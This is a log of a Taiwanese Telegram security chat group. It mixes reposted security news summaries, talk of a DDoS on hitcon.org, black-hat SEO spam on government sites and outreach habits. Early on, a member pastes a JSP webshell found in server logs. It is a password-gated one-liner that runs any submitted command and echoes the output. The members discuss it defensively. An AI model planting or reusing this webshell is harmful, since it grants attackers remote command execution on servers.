Jump to...
redirecting...

Log for 網路攻防戰~資安閒聊群組

正常能量釋放。
Allen Own 大大在facebook的post好神XD
[photo](media:AgADBQADzacxG2Q5YVUyok1bdsXYC4BIyjIABNypt-ISlD-VEzwBAAEC@telegram)
...我本來要通報
是不是掛了?
連不上
被D了www
QQ 果然是叫我不要通報的意思
所以跟這個有關嗎?wwww
好像真的被打了..hitcon.org掛了
哦 有後續狀況?
想請教熟悉JSP的高手,在Log有看到有人在表單塞了這段語法,它是想比對 pwd參數的內容等於024這個值,再印出來?
<% if("024".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
看起來是
標題:不刷機不破壞Android系統,萃取訊連科技 U通訊APP 有效跡證

摘要:
本文將針對智慧型手機通訊軟體「U通訊」,運用ADB工具來備份手機App資料,萃取其相片聊天紀錄,並利用Cygwin模擬器和SQLite Database Browser來完整地分析所儲存的資訊,存留在手機的日誌檔也因為未加密容易被萃取出,藉此分析非法者遺留的數位證據,以找出有助於鑑識人員的資訊,避免不慎破壞原證據。

本文的實驗結果並不以刷機(Root)等破壞手機方式取得最高權限萃取證據,而是正確地使用ADB工具將「U通訊」中的犯罪跡證萃取出來,使得通訊內容得以進行解讀、保存以及分析。即便犯罪者利用相片聊天功能,還是可以將其訊息萃取出來再進行鑑識。

引用來源:
http://www.netadmin.com.tw/article_content.aspx?sn=1702080012
就是webshell
謝謝,我查查。
非常感謝!
你的server完蛋了?
沒有,存取的網頁也是不存在,response code是404,只是很好奇若成功餵進來可以做到什麼事情。
然后得到root呀
嗯嗯,其實它前面還有塞其他的東西,看起來是針對Struts2而來,從URL來看也是。
就隨便掃而已
嗯,就是亂搶打鳥。
似乎不知道哪個駭客或惡意程式…
猜不到google搜尋的語法
其實不一定是 root,有可能是 administrator (X) 跟當時哪個 User 跑 service 有關 而且檔案不一定有寫入 XD
这是什么,我找了一下全部404.。。
看来你用windows server
[photo](media:AgADBQADtqcxG2Q5aVV1tt6b6ZJd_JcsyjIABPXpp8j25yuNPh0CAAEC@telegram)
O.O
干!这广告都出都是
我家Wifi怎么啦,每次要扫网站的时候会自动断网
標題:資安人才缺乏,時刻要覺察

摘要:
這邊指的資安人員,是專門負責處理資安事務的人員,他和一般的資訊人員不完全相同。

懂得寫程式的,也許對於如何提升程式效率有很專精的研究,但不見得知道程式有那些撰寫的方式會形成漏洞。

同樣的,懂得網路如何串接,並不見得明瞭駭客攻擊的方式,所以資訊人員並不等於是資安人員,但很多大眾就把這兩類的人員畫上等號。甚至還有媒體記者,把手機達人也稱為資安顧問的笑話。

就實務經驗而言,一位資訊安全人員,必需要技術與管理的技能同時俱備。不但如此從網路、系統、軟體開發,甚至APP的應用,都要有一定程度的涉獵,更重要的則是需要有相關的實務經驗。如果只是理論派大將,或只會熟背某一套標準,但是如果沒有持續的精進,很快的還是會被市場所淘汰。

所以有些單位發生過安排人員上資安課程,但結果這些人員也都沒有從事資安工作。而那些在第一線作業的人員,因為沒有適當的訓練,也弄不清資安在做些什麼。

引用來源:
http://www.informationsecurity.com.tw/article/article_detail.aspx?tv=71&aid=8407
用 google 搜尋關鍵字

送料無料 inurl:gov.tw

送料無料 inurl:edu.tw

會一直出現日本的廣告,這是 暗黑SEO 技法嗎?
有找到類似案例 但不知道是不是相同手法

網絡小黑揭秘系列之黑色SEO初探
http://bobao.360.cn/learning/detail/2508.html
標題:勒索病毒盯上追劇族,利用 Netflix 帳號產生器當誘餌

摘要:
最近趨勢科技 發現 了一個勒索病毒,專門利用所謂的 Netflix 帳號產生器來誘騙貪小便宜的 Windows/PC 使用者。這類程式通常都是放在一些專門提供破解版應用程式或付費網站服務帳號密碼的網站。

這個勒索病毒會啟動一個執行檔 (Netflix Login Generator v1.1.exe),然後將自己複製一份 (netprotocol.exe),之後再執行一次。按下「Generate Login」(產生帳號) 按鈕之後,會出現另一個訊息視窗,裡面提供了一組 (據稱是) 真的 Netflix 帳號和密碼。然而 RANSOM_NETIX.A 顯示的這些帳號密碼產生視窗其實只是幌子,因為它正在背後將「C:\使用者\」資料夾下的 39 種類型的檔案加密。

此勒索病毒採用了 AES-256 加密演算法,並且將加密後的檔案副檔名改成「.se」。其勒索訊息當中要求支付 0.18 比特幣 (約合 100 美元) 的贖金。

引用來源:
https://blog.trendmicro.com.tw/?p=47470
有看到一些是用joomla!架站 不知道有無關係 而且從頁面庫存看到 似乎是之前發生的
被摸掉了。
連進去都是 顯示網頁不存在 404 但怎會出現?
庫存頁檔呀。
之前被丟了一堆東西進去;所以Google 有cache到。
應該是發現之後,清掉了吧。
[photo](media:AgADBQADu6cxG2Q5aVVfSh7IydnhzN89yjIABIBmv0I7hTMd7kEBAAEC@telegram)
雖然我超過義務役除役年齡( > 36 歲),不過還是邊看邊笑。

教召一查就中?他抱怨「根本報名系統」 網友哭:我也是...
http://www.ettoday.net/news/20170220/870505.htm
這個就很明顯。
直接被埋在網頁中堅。
很少看到是 日文的 呵呵呵
Xss ?
可能是這個吧。
不,我是 Linux / Mac 派的,不過工作是看到 User 用 M$ XD
然后就乱中,伺服器消失
標題:Avast 釋出勒索軟體 CryptoMix 的離線版解密工具

摘要:
去年3月現身的CryptoMix有許多別名,包括CryptFile2、Zeta,以及最近的CryptoShield,當CryptoMix成功感染一台電腦時,它會與遠端的命令暨控制(C&C)伺服器聯繫,並建立用來加密檔案的金鑰,然而,若受害電腦無法連網,那麼CryptoMix就會以固定的金鑰來加密檔案。

Avast所提供的工具就是專門解開無法與C&C伺服器建立連線的離線版CryptoMix固定金鑰。

工具下載處:
https://www.avast.com/ransomware-decryption-tools#cryptomix

引用來源:
http://www.ithome.com.tw/news/112276
標題:比特幣集體勒索又來了,這次鎖定全臺4千校!不只大學,桃園3小學也出現駭客勒索信

摘要:
先前才發生券商集體遭勒索威脅的事件,最近,臺灣學術網路危機處理中心(TACERT)旗下教育機構資安通報應變小組證實,桃園市有3家中小學的網路印表機收到駭客恐嚇信,要求受害學校支付3個比特幣(約10萬元新臺幣),否則會在3月1日發動攻擊癱瘓網路。

在桃園市政府教育局轉發給全市學校的ANA資安通報中提到,因部分學校印表機和物聯網使用預設密碼,以及大部分連線印表機使用外網IP,相關資訊暴露在網路上,才會遭到駭客入侵列印恐嚇訊息或作為攻擊工具。教育部也從受害小學通報後,不只發布ANA資安通報,也展開全臺4千所各級學校大盤點,了解遭勒索信威脅的情況,不過,截至2月22日還未完成清查。

檢驗防火牆規則,確認個別系統僅開放所需對外提供服務之通訊埠,若為印表機服務務建議阻擋port 9100。教育機構資安通報應變小組也通知全臺4千多所包含大學等各級學校提高戒備。

引用來源:
http://www.ithome.com.tw/news/112282
標題:MIS注意!OpenSSL剛修補了高嚴重性的DoS漏洞

摘要:
OpenSSL軟體基金會(OpenSSL Software Foundation)上周釋出了OpenSSL 1.1.0e以修補一個允許遠端駭客展開阻斷服務攻擊(DoS)的高嚴重性漏洞。

新的DoS漏洞是由紅帽的Joe Orton所提報,只影響OpenSSL 1.1.0,並未波及OpenSSL 1.0.2。

引用來源:
http://www.ithome.com.tw/news/112281
標題:Flash漏洞補不完,Adobe一更新,微軟緊急跟進修補Windows

摘要:
嚴格說來它是Adobe的Flash Player漏洞,而非Windows漏洞,只是因為Windows中的瀏覽器內建了Adobe Flash Player而受到牽連,包括Windows 8.1、Windows 10、Windows RT 8.1、Windows Server 2012 R2與Windows Server 2016等視窗平台都必須更新。

至於Adobe則是在今年2月14日便修補了該漏洞。

微軟將此一安全更新列為重大(Critical)等級,修正了位於IE 10、IE 11與Microsoft Edge等瀏覽器中受影響的Adobe Flash程式庫。

引用來源:
http://www.ithome.com.tw/news/112283
這些是手動複製嗎 .-.
順便貼過來的阿
所以沒差吧
是阿
反正都在剪貼簿裡了
從哪順便貼的..?
人工 從原始網站上 順便貼的 一次 要貼 7分 FB、LINE、telegram、evernote
7份
試著全部自動化吧?
TG, FB 我是知道可以,其他不敢肯定
FB Telegram 好解決
又不是要將原始網站 全部轉載 只轉我覺得想轉的
LINE嗎(笑
用一隻 bot 問你要不要轉啊
他是說貼一次自動發到這七個地方
而且不是全文複製 只摘要重點
這7個地方 內容 放的不一樣喔
乙地放摘要 有的放全文 也得會寫評論
誒是喔www
辛苦了
同一份資安文章 轉7個地方 內容摘要不同
如果有人仔細看的話 哈
每個地方的人 程度不同
[photo](media:AgADBQADqacxG2Q5cVX4UIfPwuqY1qJHyjIABNSOJ6WQ8hw-SUEBAAEC@telegram)
在 FB 摘要這些文章 ,要是從後台分析 哪些議題 那些年齡層 群眾 一般使用者 對那些感興趣 調整自己在 教學上的修正
这是自荐?
不,只是 demo
半个小时就能弄一个出来惹
發送 訊息 新聞 不是難事 難的是 要發那些 給誰看
以我的 FB 粉絲團舉例,透過每一篇摘要文章的後台分析、年齡層、各種資安議題的觸及率,作為自己製作 簡報 議題的參考!
很多資安粉絲團、社群粉絲團的 文章數太少 分析不出數據
太辛苦了
應該統一發佈
同一篇文章 受眾不一樣 看的結果也不一樣
這是真的 別累壞了
換句話說 怎樣的資安議題 才是一般人 資安人 關心的呢?
當你有一天 站上講台 一樣的資安內容 不一樣的通眾 講師要有數據 來決定自己要講及製作的方向
老師辛苦了
每人看事的面向不同 關心的就不同
其實透過 LINE Telegram 群組內 觀察 群組內 甚麼樣的議題 會引起大家討論 也是製作 議題的取材參考
有人一句話就怒了 也不知他在怒啥 哈哈
辛苦了
那麼 那種話 就不能在公開場合講 避免自己 死在講台上
真的
尤其是 現在 很多 閃電講 之類的活動 沒先準備 會掛在台上
更何況 今年 還做 直播頻道的後台分析 呵呵呵
[sticker](media:AAQCABP6KIINAATaXFbhN0HOE7QPAAIC@telegram)
真的是沒有三兩三 不敢上刀山
也不是這樣說 資安 這2個字 範圍太大 有很多種面向 及接觸對象 那麼 要做點 議題分析 才能對想傳教的對象 宣導
就像 360防毒 這個東西 對一般使用者、主官管、資訊人員、資安人員的反應是不同的
的確是
老師說的沒錯
這也不是一件簡單的事情